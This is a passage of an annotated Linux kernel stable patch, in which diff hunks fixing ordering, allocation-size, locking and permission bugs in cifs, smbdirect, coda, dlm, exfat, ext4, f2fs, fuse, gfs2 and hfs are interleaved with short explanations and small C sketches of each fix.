+ 	 * If we want to do a server RDMA read, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of write request
+ 	 */
+-	if (server->rdma && !server->sign && wdata->bytes >=
+-		server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4581,14 +4638,14 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	}
+ #endif
+ 	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 wdata->offset, wdata->bytes);
++		 io_parms->offset, io_parms->length);
+ 
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/* For RDMA read, I/O size is in RemainingBytes not in Length */
+ 	if (!wdata->mr)
+-		req->Length = cpu_to_le32(wdata->bytes);
++		req->Length = cpu_to_le32(io_parms->length);
+ #else
+-	req->Length = cpu_to_le32(wdata->bytes);
++	req->Length = cpu_to_le32(io_parms->length);
+ #endif
+ 
+ 	if (wdata->credits.value > 0) {
+@@ -4596,7 +4653,7 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 						    SMB2_MAX_BUFFER_SIZE));
+ 		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+ 
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+ 		if (rc)
+ 			goto async_writev_out;
+ 
+@@ -4609,9 +4666,12 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 
+ 	if (rc) {
+ 		trace_smb3_write_err(0 /* no xid */,
+-				     req->PersistentFileId,
+-				     tcon->tid, tcon->ses->Suid, wdata->offset,
+-				     wdata->bytes, rc);
++				     io_parms->persistent_fid,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset,
++				     io_parms->length,
++				     rc);
+ 		kref_put(&wdata->refcount, release);
+ 		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+ 	}
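
Two refactors above deserve a note. wait_for_server_reconnect() hoists the wait loop out of smb2_reconnect(), preserving the 10-seconds-per-target budget and the soft-versus-hard mount split (wait once versus retry until killed), and smb3_use_rdma_offload() gathers in one place the conditions that previously appeared inline in both the read and write paths: connected, RDMA transport, not signed, not encrypted, and at or above the size threshold. The gating helper distilled (struct conn is a stand-in for the real server/tcon state):

    #include <stdbool.h>
    #include <stddef.h>

    struct conn {
    	bool connected;
    	bool rdma;
    	bool sign;
    	bool encrypt;
    	size_t rdma_threshold;
    };

    /* All-or-nothing gate: offload only when every precondition holds. */
    static bool use_rdma_offload(const struct conn *c, size_t io_len)
    {
    	if (!c || !c->connected)
    		return false;
    	if (!c->rdma)
    		return false;
    	if (c->sign || c->encrypt)	/* signed/encrypted offload unsupported */
    		return false;
    	return io_len >= c->rdma_threshold;	/* overhead only pays off above this */
    }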
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+index 8c816b25ce7c6..cf923f211c512 100644
+--- a/fs/cifs/smbdirect.c
++++ b/fs/cifs/smbdirect.c
+@@ -1700,6 +1700,7 @@ static struct smbd_connection *_smbd_get_connection(
+ 
+ allocate_mr_failed:
+ 	/* At this point, we need to do a full transport shutdown */
++	server->smbd_conn = info;
+ 	smbd_destroy(server);
+ 	return NULL;
+ 
+@@ -2217,6 +2218,7 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 	atomic_set(&info->mr_ready_count, 0);
+ 	atomic_set(&info->mr_used_count, 0);
+ 	init_waitqueue_head(&info->wait_for_mr_cleanup);
++	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	/* Allocate more MRs (2x) than hardware responder_resources */
+ 	for (i = 0; i < info->responder_resources * 2; i++) {
+ 		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
+@@ -2244,13 +2246,13 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 		list_add_tail(&smbdirect_mr->list, &info->mr_list);
+ 		atomic_inc(&info->mr_ready_count);
+ 	}
+-	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	return 0;
+ 
+ out:
+ 	kfree(smbdirect_mr);
+ 
+ 	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
++		list_del(&smbdirect_mr->list);
+ 		ib_dereg_mr(smbdirect_mr->mr);
+ 		kfree(smbdirect_mr->sgl);
+ 		kfree(smbdirect_mr);
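
Both smbdirect fixes are ordering bugs on rarely taken paths: INIT_WORK() now runs before the allocation loop that can fail, so an error can never leave the recovery work uninitialized; the error path unlinks each MR before freeing it so the list never holds freed entries; and server->smbd_conn is assigned before the full-shutdown path that dereferences it. The unlink-then-free unwind, as a compilable sketch:

    #include <stdlib.h>

    struct node { struct node *next; };

    /* Build a list of n nodes; on allocation failure, unlink and free what
     * was built so the caller never sees a partially valid list. */
    static struct node *build_list(int n)
    {
    	struct node *head = NULL;

    	for (int i = 0; i < n; i++) {
    		struct node *nd = calloc(1, sizeof(*nd));

    		if (!nd)
    			goto unwind;
    		nd->next = head;
    		head = nd;
    	}
    	return head;

    unwind:
    	while (head) {
    		struct node *next = head->next;	/* unlink, then free */

    		free(head);
    		head = next;
    	}
    	return NULL;
    }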
+diff --git a/fs/coda/upcall.c b/fs/coda/upcall.c
+index 59f6cfd06f96a..cd6a3721f6f69 100644
+--- a/fs/coda/upcall.c
++++ b/fs/coda/upcall.c
+@@ -791,7 +791,7 @@ static int coda_upcall(struct venus_comm *vcp,
+ 	sig_req = kmalloc(sizeof(struct upc_req), GFP_KERNEL);
+ 	if (!sig_req) goto exit;
+ 
+-	sig_inputArgs = kvzalloc(sizeof(struct coda_in_hdr), GFP_KERNEL);
++	sig_inputArgs = kvzalloc(sizeof(*sig_inputArgs), GFP_KERNEL);
+ 	if (!sig_inputArgs) {
+ 		kfree(sig_req);
+ 		goto exit;
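
The coda fix is the classic sizeof(*ptr) idiom: the old call sized the allocation by struct coda_in_hdr even though sig_inputArgs points at a larger argument structure (the full inputArgs union, by my reading), so writes past the header landed out of bounds. Sizing by the pointee keeps the allocation in lockstep with the pointer's declared type:

    #include <stdlib.h>

    struct small { int a; };
    struct large { struct small hdr; int payload[64]; };

    static struct large *alloc_example(void)
    {
    	/* sizeof(*p) always matches p's pointee, even if p's type changes
    	 * later; sizeof(struct small) here would under-allocate. */
    	struct large *p = calloc(1, sizeof(*p));

    	return p;
    }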
+diff --git a/fs/cramfs/inode.c b/fs/cramfs/inode.c
+index 61ccf7722fc3c..6dae27d6f553f 100644
+--- a/fs/cramfs/inode.c
++++ b/fs/cramfs/inode.c
+@@ -183,7 +183,7 @@ static void *cramfs_blkdev_read(struct super_block *sb, unsigned int offset,
+ 				unsigned int len)
+ {
+ 	struct address_space *mapping = sb->s_bdev->bd_inode->i_mapping;
+-	struct file_ra_state ra;
++	struct file_ra_state ra = {};
+ 	struct page *pages[BLKS_PER_BUF];
+ 	unsigned i, blocknr, buffer;
+ 	unsigned long devsize;
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index 6489bc22ad617..546c52c46b1c9 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -374,7 +374,7 @@ static int dlm_send_ack(int nodeid, uint32_t seq)
+ 	struct dlm_msg *msg;
+ 	char *ppc;
+ 
+-	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_NOFS, &ppc,
++	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_ATOMIC, &ppc,
+ 				   NULL, NULL);
+ 	if (!msg)
+ 		return -ENOMEM;
+@@ -401,7 +401,7 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	struct dlm_mhandle *mh;
+ 	char *ppc;
+ 
+-	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_NOFS, &ppc);
++	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_ATOMIC, &ppc);
+ 	if (!mh)
+ 		return -ENOMEM;
+ 
+@@ -483,15 +483,14 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 
+ 		switch (p->header.h_cmd) {
+ 		case DLM_FIN:
+-			/* send ack before fin */
+-			dlm_send_ack(node->nodeid, node->seq_next);
+-
+ 			spin_lock(&node->state_lock);
+ 			pr_debug("receive fin msg from node %d with state %s\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+ 
+ 			switch (node->state) {
+ 			case DLM_ESTABLISHED:
++				dlm_send_ack(node->nodeid, node->seq_next);
++
+ 				node->state = DLM_CLOSE_WAIT;
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -503,16 +502,19 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 					node->state = DLM_LAST_ACK;
+ 					pr_debug("switch node %d to state %s case 1\n",
+ 						 node->nodeid, dlm_state_str(node->state));
+-					spin_unlock(&node->state_lock);
+-					goto send_fin;
++					set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++					dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ 				}
+ 				break;
+ 			case DLM_FIN_WAIT1:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				node->state = DLM_CLOSING;
++				set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+ 				break;
+ 			case DLM_FIN_WAIT2:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				midcomms_node_reset(node);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -529,8 +531,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 				return;
+ 			}
+ 			spin_unlock(&node->state_lock);
+-
+-			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 			break;
+ 		default:
+ 			WARN_ON(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
+@@ -548,12 +548,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 		log_print_ratelimited("ignore dlm msg because seq mismatch, seq: %u, expected: %u, nodeid: %d",
+ 				      seq, node->seq_next, node->nodeid);
+ 	}
+-
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ }
+ 
+ static struct midcomms_node *
+@@ -1287,11 +1281,11 @@ void dlm_midcomms_remove_member(int nodeid)
+ 		case DLM_CLOSE_WAIT:
+ 			/* passive shutdown DLM_LAST_ACK case 2 */
+ 			node->state = DLM_LAST_ACK;
+-			spin_unlock(&node->state_lock);
+-
+ 			pr_debug("switch node %d to state %s case 2\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+-			goto send_fin;
++			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++			dlm_send_fin(node, dlm_pas_fin_ack_rcv);
++			break;
+ 		case DLM_LAST_ACK:
+ 			/* probably receive fin caught it, do nothing */
+ 			break;
+@@ -1307,12 +1301,6 @@ void dlm_midcomms_remove_member(int nodeid)
+ 	spin_unlock(&node->state_lock);
+ 
+ 	srcu_read_unlock(&nodes_srcu, idx);
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+-	srcu_read_unlock(&nodes_srcu, idx);
+ }
+ 
+ static void midcomms_node_release(struct rcu_head *rcu)
+@@ -1343,6 +1331,7 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 		node->state = DLM_FIN_WAIT1;
+ 		pr_debug("switch node %d to state %s case 2\n",
+ 			 node->nodeid, dlm_state_str(node->state));
++		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+ 		break;
+ 	case DLM_CLOSED:
+ 		/* we have what we want */
+@@ -1356,12 +1345,8 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 	}
+ 	spin_unlock(&node->state_lock);
+ 
+-	if (node->state == DLM_FIN_WAIT1) {
+-		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+-
+-		if (DLM_DEBUG_FENCE_TERMINATION)
+-			msleep(5000);
+-	}
++	if (DLM_DEBUG_FENCE_TERMINATION)
++		msleep(5000);
+ 
+ 	/* wait for other side dlm + fin */
+ 	ret = wait_event_timeout(node->shutdown_wait,
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index b04f93bc062a8..076cf8a149ef3 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -398,8 +398,8 @@ static void erofs_fscache_domain_put(struct erofs_domain *domain)
+ 			kern_unmount(erofs_pseudo_mnt);
+ 			erofs_pseudo_mnt = NULL;
+ 		}
+-		mutex_unlock(&erofs_domain_list_lock);
+ 		fscache_relinquish_volume(domain->volume, NULL, false);
++		mutex_unlock(&erofs_domain_list_lock);
+ 		kfree(domain->domain_id);
+ 		kfree(domain);
+ 		return;
+diff --git a/fs/exfat/dir.c b/fs/exfat/dir.c
+index 0fc08fdcba733..15c4f901be369 100644
+--- a/fs/exfat/dir.c
++++ b/fs/exfat/dir.c
+@@ -102,7 +102,7 @@ static int exfat_readdir(struct inode *inode, loff_t *cpos, struct exfat_dir_ent
+ 			clu.dir = ei->hint_bmap.clu;
+ 		}
+ 
+-		while (clu_offset > 0) {
++		while (clu_offset > 0 && clu.dir != EXFAT_EOF_CLUSTER) {
+ 			if (exfat_get_next_cluster(sb, &(clu.dir)))
+ 				return -EIO;
+ 
+@@ -236,10 +236,7 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 		fake_offset = 1;
+ 	}
+ 
+-	if (cpos & (DENTRY_SIZE - 1)) {
+-		err = -ENOENT;
+-		goto unlock;
+-	}
++	cpos = round_up(cpos, DENTRY_SIZE);
+ 
+ 	/* name buffer should be allocated before use */
+ 	err = exfat_alloc_namebuf(nb);
+diff --git a/fs/exfat/exfat_fs.h b/fs/exfat/exfat_fs.h
+index a8f8eee4937cb..e0af6ace633cb 100644
+--- a/fs/exfat/exfat_fs.h
++++ b/fs/exfat/exfat_fs.h
+@@ -41,7 +41,7 @@ enum {
+ #define ES_2_ENTRIES		2
+ #define ES_ALL_ENTRIES		0
+ 
+-#define DIR_DELETED		0xFFFF0321
++#define DIR_DELETED		0xFFFFFFF7
+ 
+ /* type values */
+ #define TYPE_UNUSED		0x0000
+diff --git a/fs/exfat/file.c b/fs/exfat/file.c
+index 4e0793f35e8fb..65f97fd2e167d 100644
+--- a/fs/exfat/file.c
++++ b/fs/exfat/file.c
+@@ -211,8 +211,7 @@ void exfat_truncate(struct inode *inode, loff_t size)
+ 	if (err)
+ 		goto write_size;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ write_size:
+ 	aligned_size = i_size_read(inode);
+ 	if (aligned_size & (blocksize - 1)) {
+diff --git a/fs/exfat/inode.c b/fs/exfat/inode.c
+index 5590a1e83126c..3a6d6750dbeb6 100644
+--- a/fs/exfat/inode.c
++++ b/fs/exfat/inode.c
+@@ -221,8 +221,7 @@ static int exfat_map_cluster(struct inode *inode, unsigned int clu_offset,
+ 		num_clusters += num_to_be_allocated;
+ 		*clu = new_clu.dir;
+ 
+-		inode->i_blocks +=
+-			num_to_be_allocated << sbi->sect_per_clus_bits;
++		inode->i_blocks += EXFAT_CLU_TO_B(num_to_be_allocated, sbi) >> 9;
+ 
+ 		/*
+ 		 * Move *clu pointer along FAT chains (hole care) because the
+@@ -582,8 +581,7 @@ static int exfat_fill_inode(struct inode *inode, struct exfat_dir_entry *info)
+ 
+ 	exfat_save_attr(inode, info->attr);
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	inode->i_mtime = info->mtime;
+ 	inode->i_ctime = info->mtime;
+ 	ei->i_crtime = info->crtime;
+diff --git a/fs/exfat/namei.c b/fs/exfat/namei.c
+index b617bebc3d0f3..90b0477911449 100644
+--- a/fs/exfat/namei.c
++++ b/fs/exfat/namei.c
+@@ -387,7 +387,7 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		ei->i_size_ondisk += sbi->cluster_size;
+ 		ei->i_size_aligned += sbi->cluster_size;
+ 		ei->flags = p_dir->flags;
+-		inode->i_blocks += 1 << sbi->sect_per_clus_bits;
++		inode->i_blocks += sbi->cluster_size >> 9;
+ 	}
+ 
+ 	return dentry;
+diff --git a/fs/exfat/super.c b/fs/exfat/super.c
+index 35f0305cd493c..8c32460e031e8 100644
+--- a/fs/exfat/super.c
++++ b/fs/exfat/super.c
+@@ -373,8 +373,7 @@ static int exfat_read_root(struct inode *inode)
+ 	inode->i_op = &exfat_dir_inode_operations;
+ 	inode->i_fop = &exfat_dir_operations;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	ei->i_pos = ((loff_t)sbi->root_dir << 32) | 0xffffffff;
+ 	ei->i_size_aligned = i_size_read(inode);
+ 	ei->i_size_ondisk = i_size_read(inode);
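
For context on the exfat hunks above: inode->i_blocks is counted in
512-byte units regardless of the filesystem's block or cluster size,
which is why the per-fs shifts (i_blkbits, sect_per_clus_bits) are all
replaced with a fixed ">> 9". A minimal user-space sketch of the
conversion, with hypothetical cluster_size and file size values:

  #include <stdio.h>

  /* i_blocks is kept in 512-byte units, hence the fixed shift by 9 */
  static unsigned long long bytes_to_iblocks(unsigned long long bytes)
  {
          return bytes >> 9;
  }

  int main(void)
  {
          unsigned long long cluster_size = 65536;   /* hypothetical */
          unsigned long long size = 100000;          /* hypothetical */
          /* round up to a whole cluster, as the truncate paths do */
          unsigned long long rounded =
                  (size + cluster_size - 1) & ~(cluster_size - 1);

          printf("%llu bytes -> %llu blocks\n", rounded,
                 bytes_to_iblocks(rounded));
          return 0;
  }
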
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 866772a2e068f..099a87ec9b2ab 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1422,6 +1422,13 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
+ 	uid_t owner[2] = { i_uid_read(inode), i_gid_read(inode) };
+ 	int err;
+ 
++	if (inode->i_sb->s_root == NULL) {
++		ext4_warning(inode->i_sb,
++			     "refuse to create EA inode when umounting");
++		WARN_ON(1);
++		return ERR_PTR(-EINVAL);
++	}
++
+ 	/*
+ 	 * Let the next inode be the goal, so we try and allocate the EA inode
+ 	 * in the same group, or nearby one.
+@@ -2550,9 +2557,8 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+ 	bs = kzalloc(sizeof(struct ext4_xattr_block_find), GFP_NOFS);
+-	buffer = kvmalloc(value_size, GFP_NOFS);
+ 	b_entry_name = kmalloc(entry->e_name_len + 1, GFP_NOFS);
+-	if (!is || !bs || !buffer || !b_entry_name) {
++	if (!is || !bs || !b_entry_name) {
+ 		error = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -2564,12 +2570,18 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	/* Save the entry name and the entry value */
+ 	if (entry->e_value_inum) {
++		buffer = kvmalloc(value_size, GFP_NOFS);
++		if (!buffer) {
++			error = -ENOMEM;
++			goto out;
++		}
++
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+ 	} else {
+ 		size_t value_offs = le16_to_cpu(entry->e_value_offs);
+-		memcpy(buffer, (void *)IFIRST(header) + value_offs, value_size);
++		buffer = (void *)IFIRST(header) + value_offs;
+ 	}
+ 
+ 	memcpy(b_entry_name, entry->e_name, entry->e_name_len);
+@@ -2584,25 +2596,26 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 	if (error)
+ 		goto out;
+ 
+-	/* Remove the chosen entry from the inode */
+-	error = ext4_xattr_ibody_set(handle, inode, &i, is);
+-	if (error)
+-		goto out;
+-
+ 	i.value = buffer;
+ 	i.value_len = value_size;
+ 	error = ext4_xattr_block_find(inode, &i, bs);
+ 	if (error)
+ 		goto out;
+ 
+-	/* Add entry which was removed from the inode into the block */
++	/* Move ea entry from the inode into the block */
+ 	error = ext4_xattr_block_set(handle, inode, &i, bs);
+ 	if (error)
+ 		goto out;
+-	error = 0;
++
++	/* Remove the chosen entry from the inode */
++	i.value = NULL;
++	i.value_len = 0;
++	error = ext4_xattr_ibody_set(handle, inode, &i, is);
++
+ out:
+ 	kfree(b_entry_name);
+-	kvfree(buffer);
++	if (entry->e_value_inum && buffer)
++		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+ 	if (bs)
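
The reordering in the ext4_xattr_move_to_block() hunks above follows a
copy-then-delete pattern: the entry is written to the external block
first and removed from the inode only after that succeeds, so a failure
part-way through no longer loses the attribute. A sketch of the idea
under hypothetical names (this is not the ext4 API):

  #include <string.h>

  struct slot { char val[64]; int present; };

  /* stand-in for the step that can fail in the real code */
  static int block_set(struct slot *dst, const char *val)
  {
          strncpy(dst->val, val, sizeof(dst->val) - 1);
          dst->val[sizeof(dst->val) - 1] = '\0';
          dst->present = 1;
          return 0;       /* could be -ENOSPC etc. */
  }

  static int move_entry(struct slot *src, struct slot *dst)
  {
          int err = block_set(dst, src->val); /* 1. create the copy */
          if (err)
                  return err;                 /* source still intact */
          src->present = 0;                   /* 2. delete the original */
          return 0;
  }
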
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index a71e818cd67b4..5f4519af98214 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -640,6 +640,9 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 
+ 	f2fs_down_write(&io->io_rwsem);
+ 
++	if (!io->bio)
++		goto unlock_out;
++
+ 	/* change META to META_FLUSH in the checkpoint procedure */
+ 	if (type >= META_FLUSH) {
+ 		io->fio.type = META_FLUSH;
+@@ -648,6 +651,7 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 			io->bio->bi_opf |= REQ_PREFLUSH | REQ_FUA;
+ 	}
+ 	__submit_merged_bio(io);
++unlock_out:
+ 	f2fs_up_write(&io->io_rwsem);
+ }
+ 
+@@ -726,7 +730,7 @@ int f2fs_submit_page_bio(struct f2fs_io_info *fio)
+ 	}
+ 
+ 	if (fio->io_wbc && !is_read_io(fio->op))
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, is_read_io(fio->op) ?
+ 			__read_io_type(page) : WB_DATA_TYPE(fio->page));
+@@ -933,7 +937,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, WB_DATA_TYPE(page));
+ 
+@@ -1007,7 +1011,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, bio_page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	io->last_block_in_bio = fio->new_blkaddr;
+ 
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 21a495234ffd7..7e867dff681dc 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -422,18 +422,17 @@ static int f2fs_move_inline_dirents(struct inode *dir, struct page *ipage,
+ 
+ 	dentry_blk = page_address(page);
+ 
++	/*
++	 * Start by zeroing the full block, to ensure that all unused space is
++	 * zeroed and no uninitialized memory is leaked to disk.
++	 */
++	memset(dentry_blk, 0, F2FS_BLKSIZE);
++
+ 	make_dentry_ptr_inline(dir, &src, inline_dentry);
+ 	make_dentry_ptr_block(dir, &dst, dentry_blk);
+ 
+ 	/* copy data from inline dentry block to new dentry block */
+ 	memcpy(dst.bitmap, src.bitmap, src.nr_bitmap);
+-	memset(dst.bitmap + src.nr_bitmap, 0, dst.nr_bitmap - src.nr_bitmap);
+-	/*
+-	 * we do not need to zero out remainder part of dentry and filename
+-	 * field, since we have used bitmap for marking the usage status of
+-	 * them, besides, we can also ignore copying/zeroing reserved space
+-	 * of dentry block, because them haven't been used so far.
+-	 */
+ 	memcpy(dst.dentry, src.dentry, SIZE_OF_DIR_ENTRY * src.max);
+ 	memcpy(dst.filename, src.filename, src.max * F2FS_SLOT_LEN);
+ 
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 9f0d3864d9f13..5d6fd824f74f2 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -708,18 +708,19 @@ void f2fs_update_inode_page(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct page *node_page;
++	int count = 0;
+ retry:
+ 	node_page = f2fs_get_node_page(sbi, inode->i_ino);
+ 	if (IS_ERR(node_page)) {
+ 		int err = PTR_ERR(node_page);
+ 
+-		if (err == -ENOMEM) {
+-			cond_resched();
++		/* The node block was truncated. */
++		if (err == -ENOENT)
++			return;
++
++		if (err == -ENOMEM || ++count <= DEFAULT_RETRY_IO_COUNT)
+ 			goto retry;
+-		} else if (err != -ENOENT) {
+-			f2fs_stop_checkpoint(sbi, false,
+-					STOP_CP_REASON_UPDATE_INODE);
+-		}
++		f2fs_stop_checkpoint(sbi, false, STOP_CP_REASON_UPDATE_INODE);
+ 		return;
+ 	}
+ 	f2fs_update_inode(inode, node_page);
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index fcce94ace2c23..8ba1545e01f95 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -419,6 +419,12 @@ static struct fuse_file *fuse_priv_ioctl_prepare(struct inode *inode)
+ 	struct fuse_mount *fm = get_fuse_mount(inode);
+ 	bool isdir = S_ISDIR(inode->i_mode);
+ 
++	if (!fuse_allow_current_process(fm->fc))
++		return ERR_PTR(-EACCES);
++
++	if (fuse_is_bad(inode))
++		return ERR_PTR(-EIO);
++
+ 	if (!S_ISREG(inode->i_mode) && !isdir)
+ 		return ERR_PTR(-ENOTTY);
+ 
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index e782b4f1d1043..2f04c0ff7470b 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -127,7 +127,6 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ {
+ 	struct inode *inode = page->mapping->host;
+ 	struct gfs2_inode *ip = GFS2_I(inode);
+-	struct gfs2_sbd *sdp = GFS2_SB(inode);
+ 
+ 	if (PageChecked(page)) {
+ 		ClearPageChecked(page);
+@@ -135,7 +134,7 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ 			create_empty_buffers(page, inode->i_sb->s_blocksize,
+ 					     BIT(BH_Dirty)|BIT(BH_Uptodate));
+ 		}
+-		gfs2_page_add_databufs(ip, page, 0, sdp->sd_vfs->s_blocksize);
++		gfs2_page_add_databufs(ip, page, 0, PAGE_SIZE);
+ 	}
+ 	return gfs2_write_jdata_page(page, wbc);
+ }
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 011f9e7660ef8..2015bd05cba10 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -138,8 +138,10 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 		return -EIO;
+ 
+ 	error = gfs2_find_jhead(sdp->sd_jdesc, &head, false);
+-	if (error || gfs2_withdrawn(sdp))
++	if (error) {
++		gfs2_consist(sdp);
+ 		return error;
++	}
+ 
+ 	if (!(head.lh_flags & GFS2_LOG_HEAD_UNMOUNT)) {
+ 		gfs2_consist(sdp);
+@@ -151,7 +153,9 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 	gfs2_log_pointers_init(sdp, head.lh_blkno);
+ 
+ 	error = gfs2_quota_init(sdp);
+-	if (!error && !gfs2_withdrawn(sdp))
++	if (!error && gfs2_withdrawn(sdp))
++		error = -EIO;
++	if (!error)
+ 		set_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
+ 	return error;
+ }
+diff --git a/fs/hfs/bnode.c b/fs/hfs/bnode.c
+index 2015e42e752a6..6add6ebfef896 100644
+--- a/fs/hfs/bnode.c
++++ b/fs/hfs/bnode.c
+@@ -274,6 +274,7 @@ static struct hfs_bnode *__hfs_bnode_create(struct hfs_btree *tree, u32 cnid)
+ 		tree->node_hash[hash] = node;
+ 		tree->node_hash_cnt++;
+ 	} else {
++		hfs_bnode_get(node2);
+ 		spin_unlock(&tree->hash_lock);
+ 		kfree(node);
+ 		wait_event(node2->lock_wq, !test_bit(HFS_BNODE_NEW, &node2->flags));
+diff --git a/fs/hfsplus/super.c b/fs/hfsplus/super.c
+index 122ed89ebf9f2..1986b4f18a901 100644
+--- a/fs/hfsplus/super.c
++++ b/fs/hfsplus/super.c
